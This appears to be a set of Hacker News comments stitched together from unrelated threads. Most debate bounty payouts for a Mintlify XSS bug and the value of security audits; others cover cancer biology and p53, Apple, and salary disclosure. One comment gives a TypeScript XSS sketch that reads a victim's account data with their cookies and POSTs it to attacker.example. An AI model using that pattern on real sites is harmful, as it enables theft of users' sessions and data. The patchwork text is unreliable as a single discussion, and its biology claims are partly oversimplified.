That's a limited view. The damage this could cause should be accounted for. People don't have to sell shit; they could fuck things up just for the fun of it. That's something to consider, especially with a bunch of teenagers. A shame these big corpos didn't take the chance to sponsor and encourage these kids' early careers and turn this fuck-up into good PR, at least.
That's not how economics works. I can't do my job without a computer or glasses, but that doesn't mean each of those suppliers is owed most of my salary. Preventing a 100k€ problem says almost nothing about what the payout should be. As for them just causing chaos for fun, that nets them just about nothing (what's an evening of fun worth, i.e. what are you willing to pay for a cinema ticket?). This bounty is certainly worth more (hundreds of times more) and so covers that risk as well.
In an ideal world, these bugs, especially the low-hanging fruit, shouldn't be discoverable by some random kids. These billion-dollar companies should have their own security researchers constantly monitoring their stack. But those costs are cut, because the law de facto doesn't hold them liable for getting hacked. Paying bug bounties is a very good deal for companies, but they mostly cheap out on that, too.
It's like a finder's reward elsewhere in life. If you lose your wallet, your material and immaterial loss is quite high, but apart from the cash, the contents are worth far less to a finder or thief. These kinds of rewards are meant to work on emotions and motivation. Twitter paid these kids between $1 and $20 each. That's insulting. As I said elsewhere, bug bounties are PR, and this is bad PR. Black market pricing is the absolute floor for valuation (it's basically the cash value in the wallet example).
> these bugs, especially low-hanging fruits, shouldn't be discoverable by some random kids. These billion dollar companies should have their own security researchers [...]
I'm twice this kid's age and have been doing this hobby-turned-work as long as they have. I can tell you the work we do is no different. It doesn't matter if you're 16 or 64 or what your credentials are or salary is. We're all just hackers. Hacker ethos is judging by skill, not appearance. Welcome to hacker news :P
> Twitter paid these kids each between $1 and $20.
The submission doesn't say they even contacted Xitter. I thought it was in the title just to drop names we've heard of that used this dependency. Did you legitimately find somewhere that they got ≤$20 for an exploitable XSS on the x.com or twitter.com domains? That is a strangely low amount, but then I'm not surprised by anything where Elon is involved. It could also have been a silent fix without even replying to the reporter; I've had that happen often enough. But yeah, from X I would expect a few hundred dollars at least, and from old Twitter (or another legit business) more than that (as Discord demonstrated).
Get off your high horse. In this instance it was a kid, and it doesn't concern some highly arcane flaw in a crypto library or a chained kernel exploit that might have gotten past even a pro. I already implied this bug should have been found by in-house security, so obviously it's within the domain of professionals and teenagers alike.
> The submission doesn't say they've even contacted Xitter.
This one doesn't. This one does: https://heartbreak.ing/. Or at least, I presume they meant Twitter when they wrote "one company valued 44 billion".
> Unfortunately a competitive rate agreed to in advance with a company before we do any pentesting is the only way we have ever been able to get paid fairly for this sort of work.
So, rough estimate, how much would you have made for this?
We normally find things like this in our usual 60 hour audit blocks. Rates change over time with demand, but today an audit of that length would be $27k.
Even that is quite cheap compared to letting a blackhat find this.
If I can ask about the business model, as I have a friend in a similar predicament — what percent of the time do you find vulnerabilities in those audits? Do companies push back if you don't find vulnerabilities?
We have never issued a clean report in our ~5 years of operation.
Some firms have a reputation for issuing clean reports that look good to bosses and customers, but we prefer working with clients that want an honest assessment of their attack surface and of how motivated blackhats could end their business.
We also stick around on retainer for firms that want security engineering consulting after audits to close the gaps we find and re-architect as needed. Unused retainer hours go into producing a lot of open source software to accelerate fixing the problems we see most often. This really incentivizes us to produce comprehensive reports that take into account how the software is developed and used in the real world.
Under our published threat model few companies pass level 1, and we have helped a couple get close to level 2 with post-audit consulting.
Our industry has a very long way to go as current industry standard practices are wildly dangerous and make life easy for blackhats.
As someone in a related line of work: we find vulnerabilities so close to 100% of the time that it might as well be 100% of the time. Whether they're practically exploitable or surpass your risk appetite is the real question.
These companies almost always produce "vulnerabilities", but they're also almost always trash.
"Finding: This dependency is vulnerable to CVE-X, update it, severity S". And then of course that dependency is only used during development, the vulnerable code isn't called, and they didn't bother to dig into that.
"Finding: Server allows TLS version 1.1, while it's recommended to only support version 1.2+", yeah, sure, I'm sure that if someone has broken TLS 1.1, they're coming for me, not for the banks, google, governments, apple, etc, everyone else still using TLS 1.1
... So yeah, all the audits will have "findings", they'll mostly be total garbage, and they'll charge you for it. If you're competent, you aren't going to get an RCE or XSS out of a security audit since it simply will not be there.
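To make the first example concrete, here's a toy sketch of the five minutes of digging those reports skip, namely checking whether a flagged dependency even ships or gets imported (the package name and src/ layout below are invented, not from any real report):

    // Toy reachability check; "some-flagged-package" is a placeholder.
    import { readFileSync } from "node:fs";
    import { execSync } from "node:child_process";

    const flagged = "some-flagged-package"; // whatever the scanner reported
    const pkg = JSON.parse(readFileSync("package.json", "utf8"));

    if (pkg.devDependencies?.[flagged] && !pkg.dependencies?.[flagged]) {
      // Dev-only: the "vulnerable" code never ships to production.
      console.log(`${flagged} is a devDependency; the finding is likely noise.`);
    } else {
      // Crude check (POSIX shell assumed): is the package ever imported?
      const hits = execSync(`grep -rl "${flagged}" src/ || true`)
        .toString().trim();
      console.log(hits ? `imported by:\n${hits}` : "declared but never imported");
    }

A real check would trace whether the actually-vulnerable function is reachable, but even this much separates signal from noise.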
At Distrust we do not comment on specific dependency CVEs unless they are likely exploitable, or there are a lot of them pointing at bigger problems in the overall approach to dependency management.
That said, a policy of blindly updating dependencies to patch irrelevant CVEs is itself a very real security vulnerability, because regularly pulling in millions of lines of unreviewed code from the internet makes you an easy target for supply chain attacks.
We have a few times pulled off supply chain attacks on clients who were not otherwise convinced they were a real threat.
If a $500 drone is coming for your $100M factory, the price limit for defense considerations isn't $500.
In the end, you are trying to encourage people not to fuck with your shit, instead of playing economic games. Especially with a bunch of teenagers who wouldn't even be fully criminally liable for doing something funny. $4K isn't much today, even for a teenager. Thanks to stupid AI shit like Mintlify, that's worth like 2GB of RAM or something.
It's not just compensation, it's a gesture. And really bad PR.
That's not how any of this works. A price for a vulnerability tracking the worst-case outcome of that vulnerability isn't a bounty or a market-clearing price; it's a shakedown fee. Meanwhile: the actual market-clearing price of an XSS vulnerability is very low (in most cases, it doesn't exist at all) because there aren't existing business processes those vulnerabilities drop seamlessly into; they're all situational and time-sensitive.
> the actual market-clearing price of an XSS vulnerability is very low (in most cases, it doesn't exist at all) because there aren't existing business processes those vulnerabilities drop seamlessly into; they're all situational and time-sensitive.
Could you elaborate on this? I don't fully understand the shorthand here.
I'm happy to answer questions but the only thing I could think to respond with here is just a restatement of what I said. I was terse; which part do you want me to expand on? Sorry about that!
> because there aren't existing business processes those vulnerabilities drop seamlessly into; they're all situational and time-sensitive.
what's an example of an existing business process that would make them valuable, just in theory? why do they not exist for xss vulns? why, and in what sense, are they only situational and time-sensitive?
i know you're an expert in this field. i'm not doubting the assertions, just trying to understand them better. if i understand your argument correctly, you're not doubting that the vuln found here could be damaging, only that it could make money for an adversary willing to exploit it?
I can't think of a business process that accepts and monetizes pin-compatible XSS vulnerabilities.
But for RCE, there's lots of them! RCE vulnerabilities slot into CNE implants, botnets, ransomware rigs, and organized identity theft.
The key thing here is that these businesses already exist. There are already people in the market for the vulnerabilities. If you just imagine a new business driven by XSS vulnerabilities, that doesn't create customers, any more than imagining a new kind of cloud service instantly gets you funded for one.
I wonder what you think of this, re: the disparity between the economics you just laid out and the "companies are such fkn misers!" comments that always arise in these threads on bounty payouts...
I've seen firsthand how companies devalue investment in security -- after all, it's an insurance policy whose main beneficiaries are their customers. Sure, it's also reputational insurance in theory, but what is that compared with showing more profit this quarter, or using the money for growth if you're a startup, etc.? Basically, the economic incentives are to foist the risks onto your customers and gamble that a huge incident won't sink you.
I wonder if that background calculus -- which is broadly accurate, imo -- is what rankles people about the low bounty rewards, especially from companies that could afford more?
The premise that "fucking companies are misers" operate on that I don't share is that vulnerabilities are finite and that, in the general case, there's an existential cost to not identifying and fixing them. From decades of vulnerability research work, including (over the past 5 years) as a buyer rather than a seller of that work: put 2 different teams on a project, get 2 different sets of vulnerabilities, with maybe 30-50% overlap. Keep doing that; you'll keep finding stuff.
Seen in that light, bug bounty programs are engineering services, not a security control. A thing generalist developers definitely don't get about high-end bug bounty programs is that they are more about focusing internal resources than about generating any particular set of bugs. They're a way of prioritizing triage and hardening work, driven by external incentives.
The idea that Discord is, like, eliminating their XSS risk by bidding for XSS vulnerabilities from bounty hunters; I mean, just, obviously no, right?
How does stealing someone's social media accounts not slot into "organized identity theft"?
... actually: how is XSS not a form of RCE? The script is code; it's executed on the victim's machine; it arrives remotely from an untrusted, attacker-controlled source.
And with the legitimate first-party's permissions and access, at that. It has access to things within the browser's sandbox that it probably really shouldn't. Imagine if a bank had used Mintlify or something similar to implement a customer service portal, for example.
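To sketch what that means in practice (element and endpoint names here are made up, not from the article):

    // A minimal sketch, assuming a docs widget that renders
    // attacker-controlled HTML; all names are hypothetical.
    const untrustedDocsHtml = `<img src=x onerror="exfiltrate()">`;

    // Vulnerable pattern: untrusted markup goes straight into the DOM,
    // so the onerror handler fires inside the first party's origin.
    document.getElementById("docs")!.innerHTML = untrustedDocsHtml;

    // What the injected handler can then do with the victim's session:
    async function exfiltrate(): Promise<void> {
      // Same-origin request, so the victim's cookies are attached.
      const res = await fetch("/api/account", { credentials: "include" });
      // Ship the victim's data off to the attacker.
      await fetch("https://attacker.example/collect", {
        method: "POST",
        body: JSON.stringify(await res.json()),
      });
    }

Anything the page's own JavaScript can do, the injected script can do, short of whatever CSP or cookie flags get in the way.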
You're misreading me. It's organized identity theft driven by pin-compatible RCE exploits. Is there already an identity theft ring powered by Mintlify exploits? No? Then it doesn't matter.
The subtlety here is the difference between people using an exploit (certainly they can) and people who buy exploits for serious money.
A remote code execution bug in iOS is valuable: it may take a long time to detect exploitation (potentially years if used carefully), and even after being discovered there is a long tail of devices that take time to update (although less so than on Android, or Linux running on embedded devices that can't be updated).
That's why it's worth millions on the black market and Apple will pay you $2 million for it.
An XSS is much harder to exploit quietly (the server can log everything), and it can be closed immediately, 100%, with no long tail. At the push of an update, the vulnerability is worth zero. Someone paying to purchase an XSS is probably intending to use it once (with a large blast radius) and get as much as they can in the time until it is closed (hours? maybe days?).
Just because on average the intelligence agencies or ransomware distributors wouldn't pay big bucks for an XSS on Zerodium etc. doesn't mean that sets the fair, or wise, price for disclosure. Every bug bounty program is mostly PR mitigation. It's bad PR if you underpay for a disclosed vulnerability that might have ended your business, considering the price of the security audits/practices you cheaped out on. I mean, most bug bounty programs actually pay by scope, not the market price for technically comparable exploits. If you had found an XSS vulnerability in an Apple service with this scope, I bet you would have been paid more than $4k.
I do not in fact think you would make a lot more than $4000, or even $4000 in the first place, for an Apple XSS bug, unless it was extraordinarily situationally powerful (for instance, a first-stage for a clean, direct RCE). Bounty prices have nothing at all to do with the worst-case damage a motivated actor could cause with a vulnerability.
Nice, I hadn't seen that. Well, there you go: the absolute most you're going to make for the absolute worst-case XSS bug at the largest software firm in the world.
> because Apple has been so thoroughly not-invested in gaming
Is Apple invested in anything at all right now? It seems like they are only iterating on the same products in their idiotically domain-separated legacy zoo of devices, lately even fucking that up with UI "innovation" literally everyone hates. I mean, who's talking about Apple VR anymore? Apple AI is a meme. What are they cooking with all that cash?
I am sure you hold the employer to the same standards. For example, disclosing salary range information beforehand, or writing rejection letters afterwards, so applicants who go through the trouble of doing their part aren't wasting their time and energy.
> I am sure, you hold the employer to the same standards
I most certainly do!
Incidentally, the very idea of not providing a salary range is truly baffling. I'm amazed any such advertisements generate applicants at all, other than those phoning up the HR department to tell them to stop pissing about and please state the salary.
> But I was curious if there is work happening on L1 defence — fixing the enzyme that fixes the wrong copy-paste mechanism. Or making the enzyme more efficient and powerful. Is that line of thought even valid?
Mutations in general are not the defining quality of cancer; it's mutations in these very L1 safeguards. There are several such safeguards, and a cell needs several mutations in them to become malignant. E.g. https://en.wikipedia.org/wiki/P53
Correcting genes only works under certain conditions (e.g. limited single-strand breaks) and in a narrow time frame during cell division; otherwise the safeguards trigger cell suicide or, if that fails, mark the cell for destruction by immune cells. A cell can't fix DNA that has made it through cell division, because it has nothing to proofread against.
Once the safeguards are gone, anything goes, and genetic diversity increases quickly within each tumor. This diversity is what makes cancer treatment hard: at some point there won't be a shared vulnerability across all malignant cells. The repair mechanisms are now working in favor of the cancer. For example, with radiation therapy you preferably want to induce DNA double-strand breaks, because cancer cells can't repair those; otherwise you need to raise the radical burden enough to overwhelm repair, but migrating radicals may damage distant cells, too.
I presume you could hypothetically inject mRNA of a working safeguard gene (e.g. P53) into all cells (at some point cancer cells can't be targeted selectively, since they have lost their identifying marks and present as stem cells), so the functional enzyme or transcription factor is forced to be built inside. I am sure people are trying this right now. However, the inner workings of cells at the molecular level are insanely complex, and our understanding only scratches the surface. P53, for instance, is a transcription factor, which means it modifies gene expression elsewhere; it's only a small part of a complex regulatory cascade. I doubt there is a safeguard target that can easily be injected without considering the precise timing and environment of that safeguard cascade in the cell. And of course the rest of the safeguard system needs to be present in the cell to begin with. Mind you, you don't want to cause cell suicide in healthy cells, so you want to restore the function of the whole selective complex.
Then there is the question of delivery. Can you deliver, e.g., the mRNA to every cell without raising the suspicion of the immune system? With the COVID vaccine, the enabling breakthrough was the delivery vehicle, not so much the mRNA part. Can you even reach the cancer cells at all? Cancer cells are frequently cloaked, shadowed, or cut off by senescent or necrotic cells, or have acquired unique metabolic adaptations. A bit like bacterial persistence: M. tuberculosis, for example, can evade bodily and chemical defenses for decades.
The take-away: life is complex beyond comprehension! Despite the simplifications taught in schools and the reductionist zeitgeist, we actually know very, very little about what's going on in genetics and molecular biology; most medical knowledge is empirical guessing rather than explanatory understanding.
> At the most basic level this means making sure they can run commands to execute the code
Yeah, it's gonna be fun waiting for compilation cycles when those models "reason" with themselves about a semicolon. I guess we just need more compute...